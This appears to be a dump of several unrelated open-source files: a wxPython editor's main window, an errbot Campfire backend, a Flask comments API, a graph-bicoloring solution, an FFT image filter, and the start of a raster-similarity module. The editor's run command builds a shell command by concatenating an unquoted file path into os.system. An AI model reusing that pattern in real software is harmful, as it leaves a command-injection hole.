self.Bind(wx.EVT_MENU, lambda event: self.OnPrefs(event), id=527)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnDedent(event),
id=528)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnIndent(event),
id=529)
self.Bind(wx.EVT_MENU, lambda event:f((self.id_range)[self.nb.GetSelection()]).OnComment(event),
id=559)
self.Bind(wx.EVT_MENU, lambda event:f((self.id_range)[self.nb.GetSelection()]).OnUnComment(event),
id=560)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.FindDocText(event, (self.id_range)[self.nb.GetSelection()]),
id=530)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.ReplaceDocText(event, (self.id_range)[self.nb.GetSelection()]),
id=531)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.FindDocText(event, (self.id_range)[self.nb.GetSelection()],wx.stc.STC_FIND_REGEXP),
id=532)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.ReplaceDocText(event ,(self.id_range)[self.nb.GetSelection()], wx.stc.STC_FIND_REGEXP),
id=533)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnStartRecordMacro(event), id=534)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnStopRecordMacro(event), id=542)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnMacroPlayback(event), id=543)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnZoomIn(event),
id=535)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnZoomOut(event),
id=536)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnResetZoom(event),
id=537)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("LineNumbers",
self.menubar.IsChecked(538), self.id_range), id=538)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("FoldMarks",
self.menubar.IsChecked(539), self.id_range), id=539)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("Whitespace",
self.menubar.IsChecked(540), self.id_range), id=540)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("IndetationGuides",
self.menubar.IsChecked(541), self.id_range), id=541)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("EdgeLine",
self.menubar.IsChecked(546), self.id_range), id=546)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("SyntaxHighlight",
self.menubar.IsChecked(547), self.id_range), id=547)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("StatusBar",
self.menubar.IsChecked(545), self.id_range), id=545)
self.Bind(wx.EVT_MENU, self.OnFullScreen, id=557)
self.Bind(wx.EVT_MENU, self.ToggleSidePanel, id = 548)
self.Bind(wx.EVT_MENU, self.ToggleBottomPanel, id = 549)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnRemoveTrails(event),id=551)
self.Bind(wx.EVT_MENU, lambda event: self.OnRun(event,self.id_range[self.nb.GetSelection()]), id = 558)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).Tabify(event), id = 552 )
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).UnTabify(event), id = 553 )
self.Bind(wx.EVT_MENU, self.SaveSessionFile , id = 554)
self.Bind(wx.EVT_MENU, gEcritSession.DeleteSessionFile , id = 555)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("Session",self.menubar.IsChecked(556)) , id = 556)
self.Bind(wx.EVT_MENU, self.plugin_conf_manager.ShowMe, id = 564 )
self.Bind(wx.EVT_MENU, lambda event: self.OnAbout(event), id=550)
#setting up the toolbar
self.toolbar = MainToolbar(self, -1)
self.FontCtrl = wx.FontPickerCtrl(self.toolbar, 607, size=(100,
30))
self.Bind(wx.EVT_FONTPICKER_CHANGED, lambda event: ChangeFont(event,
self.FontCtrl.GetSelectedFont(), self.id_range))
#the goto line text box
self.toolbar.AddControl(self.FontCtrl)
self.toolbar.AddControl(wx.TextCtrl(self.toolbar, 608, size=(-1,
-1), style=wx.TE_PROCESS_ENTER))
#Binding toolbar events
self.Bind(wx.EVT_TOOL, lambda event: self.NewTab(event,
"New Document", "New Document"), id=600)
self.Bind(wx.EVT_TOOL, self.OnOpenFile, id=601)
self.Bind(wx.EVT_TOOL, lambda event: f((self.id_range)[self.nb.GetSelection()]).Save(event),
id=602)
self.Bind(wx.EVT_TOOL, lambda event: f((self.id_range)[self.nb.GetSelection()]).SaveAs(event),
id=603)
self.Bind(wx.EVT_TOOL, self.OnPrefs, id=604)
self.Bind(wx.EVT_TOOL, self.OnQuit, id=605)
self.Bind(wx.EVT_TEXT_ENTER, lambda event: self.OnGotoBox(event,
(self.id_range)[self.nb.GetSelection()]), id=608)
self.Bind(wx.EVT_TOOL, self.OnPrint, id=609)
self.Bind(wx.EVT_TOOL, lambda event: self.OnRun(event, (self.id_range)[self.nb.GetSelection()]),
id=610)
#Give the plugins a chance to set themselves in the system
#generals first
for g in self.general_plugins:
self.general_plugins[g].Init(self)
#passives now
for p in self.passive_plugins:
self.passive_plugins[p].Init(self)
        #put it in the middle of the screen
self.Centre()
#the preferences window
        self.conf_win = CfgFrame(self)
        #adding the panes to the aui manager.
self.aui_manager.AddPane(self.toolbar, wx.aui.AuiPaneInfo().Name("toolbar").Caption(self._("Toolbar")).ToolbarPane().Top().CloseButton(False))
self.aui_manager.AddPane(self.nb, wx.aui.AuiPaneInfo().Name("editor tabs").Caption(self._("Tabs")).CenterPane())
self.aui_manager.AddPane(self.bottom_notebook, wx.aui.AuiPaneInfo().Name("bottom panel").Caption(self._("Assistants and others")).Bottom().BestSize((700,150)).PinButton(True).MaximizeButton(True))
self.aui_manager.AddPane(self.side_notebook, wx.aui.AuiPaneInfo().Name("left_side panel").Caption(self._("Toolbox")).Left().BestSize((150,400)).PinButton(True).MaximizeButton(True))
#loading saved session if any exists and if enabled
if Config.GetOption("Session"):
self.LoadSessionFile()
#make changes visible
self.aui_manager.Update()
if target_file: #load command line file path argument
self.NewTab(0, os.path.split(target_file)[-1], target_file)
def LoadSessionFile(self):
"""
LoadSessionFile
Loads the session file if it exists.
If it does not, creates an instance.
"""
try:
self.session = gEcritSession.LoadFromFile()
self.session.RestoreAppState(self)
self.SetStatus(0,self._ ( "Session file loaded."))
except Exceptions.NoSessionFile:
self.session = gEcritSession()
def SaveSessionFile(self, event):
"""
SaveSessionFile
        Records the application state and saves it to disk via the
session instance.
"""
try: #testing if a session object exists
self.session
except AttributeError:
self.session = gEcritSession()
self.session.RecordAppState(self)
self.session.SaveToFile()
self.SetStatus(event, self._ ("Session saved."))
def OnFullScreen(self,event):
"""
OnFullScreen
Makes the main window fullscreen.
"""
self.ShowFullScreen(not self.IsFullScreen(),wx.FULLSCREEN_NOCAPTION)
def OnPrefs(self, event):
"""
OnPrefs
Shows the preferences window.
"""
self.conf_win.ShowMe(0)
def NewTab(self, event, nb, file_path):
"""
NewTab
Creates a new AUI NOTEBOOK tab, adds the contents,
        initializes an STC object for it and binds some of its events.
Creates the sidebar, adds a notebook and adds its utilities
in its tabs.
"""
if not file_path:
return
#update recent file list
if file_path != "New Document" and file_path != "":
if not os.path.exists(file_path):
wx.MessageDialog(None, self._ ("Could not load file.\nThe file ")+file_path+self._ (" does not exists."),self._ ("Input Error") ,wx.OK).ShowModal()
return
lst = Config.GetOption("RecentFiles")
lst.append(file_path)
Config.ChangeOption("RecentFiles",lst)
self.menubar.UpdateRecentFiles()
#the parent of the StcControl
panel = wx.Panel(self)
panel.identifierTag = nb
        #keep a local copy of the current text id
text_id = self.text_id
#set up the editor
text_ctrl = StcTextCtrl(panel, self.text_id, file_path)
#the StcControl sizer
text_ctrl_sizer = wx.BoxSizer(wx.HORIZONTAL)
text_ctrl_sizer.Add(text_ctrl, 1, wx.EXPAND)
panel.SetSizer(text_ctrl_sizer)
panel.Fit()
#append the id of this StcControl to the id_range
self.id_range.append(text_id)
text_ctrl.SetBufferedDraw(True)
#apply the font
text_ctrl.StyleSetFont(0, self.FontCtrl.GetSelectedFont())
#add the panel as a new tab
self.nb.AddPage(panel, str(nb), select=True)
if file_path == "New Document" or file_path == "":
#notify plugins
for g in self.general_plugins:
self.general_plugins[g].NotifyNewTabOpened()
self.text_id += 1
return text_ctrl
def OnRun(self, event, text_id):
"""
Runs the current document in a xterm window, for testing.
"""
cur_doc = wx.FindWindowById(text_id)
cur_doc.Save(0)
os.system("xterm -e sh runner.sh "+cur_doc.GetFilePath())
def OnGotoBox(self, event, text_id):
"""
OnGotoBox
Finds the current document, and scrolls to the line indicated
by its input upon the Return key.
"""
cur_doc = wx.FindWindowById(text_id)
goto = wx.FindWindowById(608)
scroll_pos = int(goto.GetLineText(0))
cur_doc.ScrollToLine(scroll_pos - 1)
def OnPrint(self, event):
"""
OnPrint
        Finds the document, sets the print job name, and calls the
wxPython toolkit to print the contents
"""
print_dlg = PrettyPrinter(self)
del print_dlg
def OnAbout(self, event):
"""
OnAbout
Shows the about window.
"""
#ShowAbout = AboutWindow
about_win = AboutWindow()
del about_win
def OnQuit(self, event):
"""
OnQuit
Closes the main window, stops the terminals, and kills the
application process.
        It prompts the user for confirmation.
"""
#warn the user
warn_dlg = wx.MessageDialog(None,
self._ ("Please make sure that your data is\
saved.\nAre you sure you want to quit?"),
self._ ("Are you sure?"), style=wx.YES_NO)
warn_dlg_val = warn_dlg.ShowModal()
        if warn_dlg_val != 5104: # 5104 == wx.ID_NO, so anything else means YES
#call the quit method to stop the terminals and the plugins
self.Quit()
def Quit(self):
        #stop and notify all plugins of application shutdown.
#generals now
for g in self.general_plugins:
self.general_plugins[g].Stop()
for p in self.passive_plugins:
self.passive_plugins[p].Stop()
        #save the session file if sessions are enabled
if Config.GetOption("Session"):
self.SaveSessionFile(0)
#exit status 0, all ok
sys.exit(0)
def OnMenuCloseTab(self, event, text_id):
self.ManageCloseTab(False, text_id)
def ManageCloseTab(self, event, text_id):
"""
ManageCloseTab
Manages the process of closing a tab.
Checks if document is saved, prompts the user if not.
If this is the last tab in the application, it closes the
terminals, the window and kills the application.
        If not, it decreases the number of tabs and deletes the AUI
        NOTEBOOK page.
"""
cur_doc = wx.FindWindowById(text_id)
current_text = cur_doc.GetText()
#check if the user saved the changes
if cur_doc.save_record != current_text:
#if not, notify him
save_prompt = wx.MessageDialog(None, self._ ("The file ") + os.path.split(cur_doc.GetFilePath())[-1] +
self._ (" is not saved.\n\
Do you wish to save it?"), "",
style=wx.CANCEL | wx.YES | wx.NO)
prompt_val_ = save_prompt.ShowModal()
if prompt_val_ == 5103: #YES
if not cur_doc.Save(0):
event.Veto()
return
else:
self.id_range.remove(text_id)
elif prompt_val_ == 5101: #CANCEL
event.Veto()
return
elif prompt_val_ == 5104: #NO
self.id_range.remove(text_id)
save_prompt.Destroy()
else:
self.id_range.remove(text_id)
# skip the event and let the AuiNotebook handle the deletion
        cur_doc.Deactivate() # tell the StcTextCtrl to prepare for deletion
if not event: # check if it was fired from menu
self.nb.DeletePage(self.nb.GetSelection())
else:
event.Skip()
def OnOpenFile(self, event):
"""
OnOpenFile
Collects a path for a new file via a file dialog.
"""
open_file_dlg = wx.FileDialog(None, style=wx.OPEN | wx.FD_MULTIPLE)
if self.menubar.last_recent != "":
#go to the last accessed folder
open_file_dlg.SetDirectory(os.path.split(self.menubar.last_recent)[0])
else:
open_file_dlg.SetDirectory(self.HOMEDIR)
if open_file_dlg.ShowModal() == wx.ID_OK:
paths = open_file_dlg.GetPaths()
self.OpenFile(paths)
del open_file_dlg
def OpenFile(self, paths):
"""
OpenFile
Calls NewTab with the collected path.
Supports multiple path selection.
"""
        # if paths is a list, open an StcControl for each of them
if isinstance(paths, types.ListType):
for f in paths:
self.NewTab(0, os.path.split(f)[-1], f)
Log.AddLogEntry(self._ ("Opened file ") + f)
#if a string, open an StcControl for it
else:
self.NewTab(0, os.path.split(paths)[-1], paths)
Log.AddLogEntry(self._ ("Opened file ") + paths)
#notify general plugins
for t in self.general_plugins:
try: #insulate from possible plugin errors
self.general_plugins[t].NotifyDocumentOpened()
except: pass
AutoComp.UpdateCTagsFiles(self.id_range)
def SetStatus(self, event, text):
"""
        SetStatus
        Sets the status bar text.
"""
self.status_bar.SetStatusText(text)
# event.Skip()
def ResetStatus(self, event):
"""
ResetStatus
Sets the status bar status to nothing.
"""
self.status_bar.SetStatusText("")
event.Skip()
def SaveAll(self, event):
"""
SaveAll
Saves all the current documents using the
objects Save function.
"""
for id in self.id_range:
cur_doc = wx.FindWindowById(id)
if cur_doc.GetFilePath() != "" and cur_doc.GetFilePath() != \
"New Document":
cur_doc.Save(0)
####################################################################
# PLUGIN INTERFACE #
####################################################################
def ToggleSidePanel(self, event):
pane = self.aui_manager.GetPane(self.side_notebook)
if pane.IsShown(): pane.Hide()
else: pane.Show()
self.aui_manager.Update()
def ToggleBottomPanel(self, event):
pane = self.aui_manager.GetPane(self.bottom_notebook)
if pane.IsShown(): pane.Hide()
else: pane.Show()
self.aui_manager.Update()
def GetCurrentDocument(self):
"""
GetCurrentDocument
Returns the selected active buffer object.
"""
try:
return wx.FindWindowById(self.id_range[self.nb.GetSelection()])
except IndexError:
return None
def GetAllDocuments(self):
"""
        GetAllDocuments
Returns all existing buffers.
"""
docs = []
for d in self.id_range:
docs.append(wx.FindWindowById((d)))
return docs
def AddToMenuBar(self,label,menu):
"""
AddToMenuBar
@label The label of the new menu entry.
@menu A wx.Menu object which will be added in the Plugins menu.
Adds a wx.Menu object to menubar.
"""
return self.menubar.plugins.AppendMenu(-1,label,menu)
def RemoveFromMenubar(self, menu):
"""
RemoveFromMenubar
Removes the supplied argument menu from the plugins submenu.
"""
self.menubar.plugins.RemoveItem(menu)
def BindMenubarEvent(self, item, function):
"""
BindMenuBarEvent
        @item The menu entry object to be bound.
        @function The function the item is to be bound to.
        Binds a wx.EVT_MENU event to the supplied function.
"""
self.Bind(wx.EVT_MENU, function, id = item.GetId())
def GetBottomPanel(self):
"""
GetBottomPanel
Returns the lower notebook.
"""
return self.bottom_notebook
def AddToBottomPanel(self, panel, name):
"""
AddToBottomPanel
        Adds the supplied panel to the lower notebook with the supplied
name label.
"""
self.bottom_notebook.AddPage(panel, name)
def GetSidePanel(self):
"""
GetSidePanel
Returns the side notebook.
"""
return self.side_notebook
def AddToSidePanel(self, panel, name):
"""
AddToSidePanel
        Adds the supplied panel to the side notebook with the supplied
name label.
"""
self.side_notebook.AddPage(panel, name)
def DeleteBottomPage(self, name):
"""
DeleteBottomPage
Deletes the tab named name from the lower notebook.
"""
self.bottom_notebook.DeletePage(Config.GetTab(name,
self.bottom_notebook))
def DeleteSidePage(self, name):
"""
DeleteSidePage
Deletes the tab named name from the side notebook.
"""
self.side_notebook.DeletePage(Config.GetTab(name,
self.side_notebook))
def AddPaneToAui(self, widget ,pane_info):
"""
"AddPaneToAui
@widget the widget to be added
        @pane_info needs to be an AuiPaneInfo object.
Adds the pane to the aui manager.
"""
self.aui_manager.AddPane(widget, pane_info)
def AddToolbarToAui(self, toolbar, pane_info):
"""
        AddToolbarToAui
@toolbar the wx.Toolbar object
        @pane_info needs to be a wx.AuiPaneInfo object with its name and caption
defined.
"""
self.aui_manager.AddPane(toolbar, pane_info.ToolbarPane().Top().CloseButton(False))
def GetAuiManager(self):
"""
GetAuiManager
        Returns the AuiManager that is responsible for window layout.
"""
return self.aui_manager
def GetTabManager(self):
"""
GetTabManager
        Returns the AuiNoteBook that is responsible for tab management.
"""
return self.nb
def CreateNewDocument(self, name):
"""
CreateNewDocument
@name a string to be given to the new document as a name.
Creates a new empty document.
        Returns a reference to the new StcControl.
"""
return self.NewTab(0, name, "")
def main():
app = wx.PySimpleApp()
frame = gEcrit(parent=None, id=-1)
frame.Show()
app.MainLoop()
if __name__ == '__main__':
main()
| gpl-3.0 | 6,744,079,877,106,836,000 | 35.32797 | 204 | 0.581746 | false |
bolshoibooze/err | errbot/backends/campfire.py | 1 | 4381 | import logging
import sys
from errbot.backends.base import Message, build_message
from errbot.errBot import ErrBot
from threading import Condition
log = logging.getLogger(__name__)
try:
import pyfire
except ImportError:
log.exception("Could not start the campfire backend")
log.fatal("""
If you intend to use the campfire backend please install pyfire:
pip install pyfire
""")
sys.exit(-1)
class CampfireConnection(pyfire.Campfire):
rooms = {} # keep track of joined room so we can send messages directly to them
def join_room(self, name, msg_callback, error_callback):
room = self.get_room_by_name(name)
room.join()
stream = room.get_stream(error_callback=error_callback)
stream.attach(msg_callback).start()
self.rooms[name] = (room, stream)
ENCODING_INPUT = sys.stdin.encoding
class CampfireIdentifier(object):
def __init__(self, user):
self._user = user # it is just one room for the moment
@property
def user(self):
return self._user
class CampfireBackend(ErrBot):
exit_lock = Condition()
def __init__(self, config):
super(CampfireBackend, self).__init__(config)
identity = config.BOT_IDENTITY
self.conn = None
self.subdomain = identity['subdomain']
self.username = identity['username']
self.password = identity['password']
        if not hasattr(config, 'CHATROOM_PRESENCE') or len(config.CHATROOM_PRESENCE) < 1:
raise Exception('Your bot needs to join at least one room, please set'
' CHATROOM_PRESENCE with at least a room in your config')
self.chatroom = config.CHATROOM_PRESENCE[0]
self.room = None
self.ssl = identity['ssl'] if 'ssl' in identity else True
self.bot_identifier = None
def send_message(self, mess):
super(CampfireBackend, self).send_message(mess)
self.room.speak(mess.body) # Basic text support for the moment
def serve_forever(self):
self.exit_lock.acquire()
self.connect() # be sure we are "connected" before the first command
        self.connect_callback() # notify that the connection occurred
try:
log.info("Campfire connected.")
self.exit_lock.wait()
except KeyboardInterrupt:
pass
finally:
self.exit_lock.release()
self.disconnect_callback()
self.shutdown()
def connect(self):
if not self.conn:
self.conn = CampfireConnection(self.subdomain, self.username, self.password, self.ssl)
self.bot_identifier = self.build_identifier(self.username)
            self.room = self.conn.get_room_by_name(self.chatroom)
# put us by default in the first room
# resource emulates the XMPP behavior in chatrooms
return self.conn
def build_message(self, text):
return Message(text, type_='groupchat') # it is always a groupchat in campfire
def shutdown(self):
super(CampfireBackend, self).shutdown()
def msg_callback(self, message):
log.debug('Incoming message [%s]' % message)
user = ""
if message.user:
user = message.user.name
if message.is_text():
msg = Message(message.body, type_='groupchat') # it is always a groupchat in campfire
msg.frm = CampfireIdentifier(user)
msg.to = self.bot_identifier # assume it is for me
self.callback_message(msg)
def error_callback(self, error, room):
log.error("Stream STOPPED due to ERROR: %s in room %s" % (error, room))
self.exit_lock.acquire()
self.exit_lock.notify()
self.exit_lock.release()
def join_room(self, room, username=None, password=None):
self.conn.join_room(room, self.msg_callback, self.error_callback)
def build_message(self, text):
return build_message(text, Message)
def build_identifier(self, strrep):
return CampfireIdentifier(strrep)
def send_simple_reply(self, mess, text, private=False):
"""Total hack to avoid stripping of rooms"""
self.send_message(self.build_reply(mess, text, True))
@property
def mode(self):
return 'campfire'
def groupchat_reply_format(self):
return '@{0} {1}'
| gpl-3.0 | -7,363,828,428,747,781,000 | 32.7 | 98 | 0.632276 | false |
EOOOL/flaskq | app/api_1_0/comments.py | 1 | 2405 | from flask import jsonify, request, g, url_for, current_app
from .. import db
from ..models import Post, Permission, Comment
from . import api
from .decorators import permission_required
@api.route('/comments/')
def get_comments():
page = request.args.get('page', 1, type=int)
pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_comments', page=page-1, _external=True)
next = None
if pagination.has_next:
next = url_for('api.get_comments', page=page+1, _external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/comments/<int:id>')
def get_comment(id):
comment = Comment.query.get_or_404(id)
return jsonify(comment.to_json())
@api.route('/posts/<int:id>/comments/')
def get_post_comments(id):
post = Post.query.get_or_404(id)
page = request.args.get('page', 1, type=int)
pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_post_comments', id=id, page=page-1,
_external=True)
next = None
if pagination.has_next:
next = url_for('api.get_post_comments', id=id, page=page+1,
_external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/posts/<int:id>/comments/', methods=['POST'])
@permission_required(Permission.COMMENT)
def new_post_comment(id):
post = Post.query.get_or_404(id)
comment = Comment.from_json(request.json)
comment.author = g.current_user
comment.post = post
db.session.add(comment)
db.session.commit()
return jsonify(comment.to_json()), 201, \
{'Location': url_for('api.get_comment', id=comment.id,
_external=True)}
| mit | 1,175,486,497,100,385,800 | 32.357143 | 75 | 0.607484 | false |
secnot/uva-onlinejudge-solutions | 10004 - Bicoloring/main.py | 1 | 1734 | import sys
from collections import deque
def load_num():
num_str = sys.stdin.readline()
if num_str == '\n' or num_str=='':
return None
return list(map(int, num_str.rstrip().split()))
def load_graph():
"""Load graph into its adjacency list"""
vertices = load_num()[0]
# Check it is a valid graph and not the end of the file
if vertices==0:
return None
    # Load each edge and construct the adjacency list
edges = load_num()[0]
adjList = [list() for v in range(vertices)]
for i in range(edges):
s, e = load_num()
adjList[s].append(e)
adjList[e].append(s)
return adjList
def is_bicolored(adjList):
"""Use BFS, when the edges of a vertex are processed:
* If the vertex found is new assign a color opposite to current.
* If the vertex was already processed and has same color to current
the graph is not bicolored
"""
vertices = len(adjList)
discovered = [False for x in range(vertices)]
processed = [False for x in range(vertices)]
color = [-1 for x in range(vertices)]
q = deque([0])
color[0] = 0
while q:
v = q.popleft()
processed[v] = True
for n in adjList[v]:
if not discovered[n]:
discovered[n] = True
color[n] = 0 if color[v] else 1
q.append(n)
elif color[n]==color[v]:
return False
return True
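# --- Illustrative sketch, not part of the original solution ------------------
# Hypothetical adjacency lists exercising the BFS 2-colouring above: an odd
# cycle (triangle) cannot be bicolored, an even cycle (square) can.
def _example_is_bicolored():
    triangle = [[1, 2], [0, 2], [0, 1]]        # expected: False
    square = [[1, 3], [0, 2], [1, 3], [0, 2]]  # expected: True
    return is_bicolored(triangle), is_bicolored(square)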
if __name__ == '__main__':
while True:
adj = load_graph()
if not adj:
break
if is_bicolored(adj):
print("BICOLORABLE.")
else:
print("NOT BICOLORABLE.")
exit(0)
| mit | -2,551,883,087,197,521,400 | 20.949367 | 76 | 0.544983 | false |
beremaran/cbu-cse3113 | hw07.py | 1 | 2388 | #!/usr/bin/env python
import argparse
import numpy as np
from PIL import Image
'''
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
'''
Berke Emrecan Arslan <[email protected]>
140315025
Faculty of Engineering, Computer Science & Engineering
Manisa Celal Bayar University
Taken from;
https://github.com/beremaran/cbu-cse3113
'''
def im_load(img_path):
im = Image.open(img_path)
im = im.convert('L')
return np.asarray(im, dtype=np.uint8)
def im_center(im):
return np.asarray(im.shape) / 2
def im_r(im, coordinates=(0, 0)):
return np.linalg.norm(im_center(im) - coordinates)
def im_r_max(im):
return im_r(im, np.zeros((2,)))
def im_filter(im, filter_type, filter_gain):
    # cut-off radius expressed as a fraction of the maximum centre distance
    r = im_r_max(im) * filter_gain
    center = im_center(im)
    y, x = np.ogrid[:im.shape[0], :im.shape[1]]
    k = 1 if filter_type == "lowpass" else -1
    # boolean mask: True inside the radius for lowpass, outside it for highpass
    return -1 * k * np.sqrt((y - center[0]) ** 2 + (x - center[1]) ** 2) >= r * k * -1
def run(img_path, filter_type="lowpass", filter_gain=0.1):
    im = im_load(img_path)
    # move to the frequency domain and centre the zero frequency
    f = np.fft.fft2(im)
    f = np.fft.fftshift(f)
    # suppress frequencies outside the pass band (set them to 1)
    f[~im_filter(f, filter_type, filter_gain)] = 1
    # shift back and return to the spatial domain
    f = np.fft.ifftshift(f)
    f = np.fft.ifft2(f)
    # keep the magnitude and save as an 8-bit grayscale image
    f = abs(f)
    Image.fromarray(f.astype(np.uint8)).save("140315025HW07.png", "PNG")
if __name__ == "__main__":
argparser = argparse.ArgumentParser("140315025HW07.py", description="Low-pass or high-pass filtering for images")
argparser.add_argument("image_path", help="Image to be filtered")
argparser.add_argument("filter_type", choices=["lowpass", "highpass"], help="Filter type")
argparser.add_argument("gain", type=float, help="Filter's gain")
args = argparser.parse_args()
run(args.image_path, args.filter_type, args.gain)
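# Illustrative usage note (not part of the original script; the image name is
# an assumption): invoking e.g.
#     python hw07.py photo.png lowpass 0.1
# applies the circular low-pass frequency mask and writes the result to
# 140315025HW07.png, as defined in run() above.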
| gpl-3.0 | -3,285,391,032,930,099,700 | 27.771084 | 117 | 0.664154 | false |
VUEG/bdes_to | src/03_post_processing/similarity.py | 1 | 18175 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Functions and utilities comparing raster and vector similarities.
Module can be used alone or as part of Snakemake workflow.
"""
import logging
import rasterio
import geopandas as gpd
import pandas as pd
import numpy as np
import numpy.ma as ma
from importlib.machinery import SourceFileLoader
from scipy.spatial.distance import jaccard
from scipy.stats import kendalltau
from timeit import default_timer as timer
utils = SourceFileLoader("lib.utils", "src/00_lib/utils.py").load_module()
def compute_jaccard(x, y, x_min=0.0, x_max=1.0, y_min=0.0, y_max=1.0,
warn_uneven=True, limit_tolerance=4, disable_checks=False):
"""Calculate the Jaccard index (Jaccard similarity coefficient).
The Jaccard coefficient measures similarity between sample sets, and is
defined as the size of the intersection divided by the size of the union of
the sample sets. The Jaccard coefficient can be calculated for a subset of
rasters provided by using the threshold argument.
    Min and max limit values can be given for both array objects x
    and y. The method can be used with arrays of any value range, but
    the defaults [0.0, 1.0] are geared towards comparing Zonation rank priority
    rasters. Limits provided are inclusive.
:param x ndarray object.
:param y ndarray object.
:param x_min Numeric minimum threshold value for x to be used
(default 0.0).
:param x_max Numeric maximum threshold value for x to be used
(default 1.0).
:param y_min Numeric minimum threshold value for y to be used
(default 0.0).
:param y_max Numeric maximum threshold value for y to be used
(default 1.0).
:param warn_uneven Boolean indicating whether a warning is raised if the
compared raster coverages are very (>20x) uneven.
:param limit_tolerance integer values that defines to which precision x and
y limits are rounded to. This helps e.g. with values
that close to 0 but not quite 0 (default: 4, i.e.
round(x, 4)).
:param disable_checks boolean indicating if the input limit values are
checked against the actual raster values in x and y.
:return numeric value in [0, 1].
"""
if not disable_checks:
assert x_min >= np.round(np.min(x), limit_tolerance), "Min threshold smaller than computed min of x"
assert x_max <= np.round(np.max(x), limit_tolerance), "Max threshold greater than computed max of x"
        assert x_min < x_max, "Min threshold for x must be smaller than max threshold"
assert y_min >= np.round(np.min(y), limit_tolerance), "Min threshold smaller than computed min of y"
assert y_max <= np.round(np.max(y), limit_tolerance), "Max threshold greater than computed max of y"
        assert y_min < y_max, "Min threshold for y must be smaller than max threshold"
# Get the values according to the limits provided
x_bin = (x >= x_min) & (x <= x_max)
y_bin = (y >= y_min) & (y <= y_max)
if warn_uneven:
x_size = np.sum(x_bin)
y_size = np.sum(y_bin)
# Sort from smaller to larger
sizes = np.sort([x_size, y_size])
if sizes[1] / sizes[0] > 20:
print("WARNING: The extents of raster values above the "
"threshhold differ more than 20-fold: Jaccard coefficient " +
"may not be informative.")
# Compute the Jaccard-Needham dissimilarity between two boolean 1-D arrays
# and subtract from 1 to get the Jaccard index
return 1 - jaccard(x_bin.flatten(), y_bin.flatten())
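# --- Illustrative sketch, not part of the original module --------------------
# A minimal, hypothetical use of compute_jaccard() on toy arrays. With
# x_min=y_min=0.5 the binary masks flatten to [F, T, T, F] and [T, F, T, F],
# so intersection / union = 1 / 3.
def _example_compute_jaccard():
    a = np.array([[0.2, 0.8], [1.0, 0.1]])
    b = np.array([[0.6, 0.3], [0.9, 0.05]])
    # disable_checks=True because b's maximum (0.9) is below the default
    # y_max of 1.0, which the limit checks would otherwise reject.
    return compute_jaccard(a, b, x_min=0.5, y_min=0.5, disable_checks=True)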
def cross_correlation(input_rasters, verbose=False, logger=None):
""" Calculate Kendall tau rank correlation between all the inpur rasters.
Input rasters are read in as masked arrays and all cells that are NoData
are discarded. This way, only the values of informative cells are passed
on to scipy.stats.kendalltau() which makes things faster. The assumption is
that all rasters exactly match on which cells have values. An intersection
of both rasters' masks is used to define informative cells.
:param input_rasters list of input raster paths.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return Pandas Dataframe with rank correlation information.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_correlation')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING KENDALL TAU RANK CORRELATIONS **]")
all_correlations = pd.DataFrame({"feature1": [], "feature2": [],
"tau": [], "pvalue": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2)
no_computation = 1
for i in range(0, n_rasters):
raster1 = rasterio.open(input_rasters[i])
raster1_src = raster1.read(1, masked=True)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
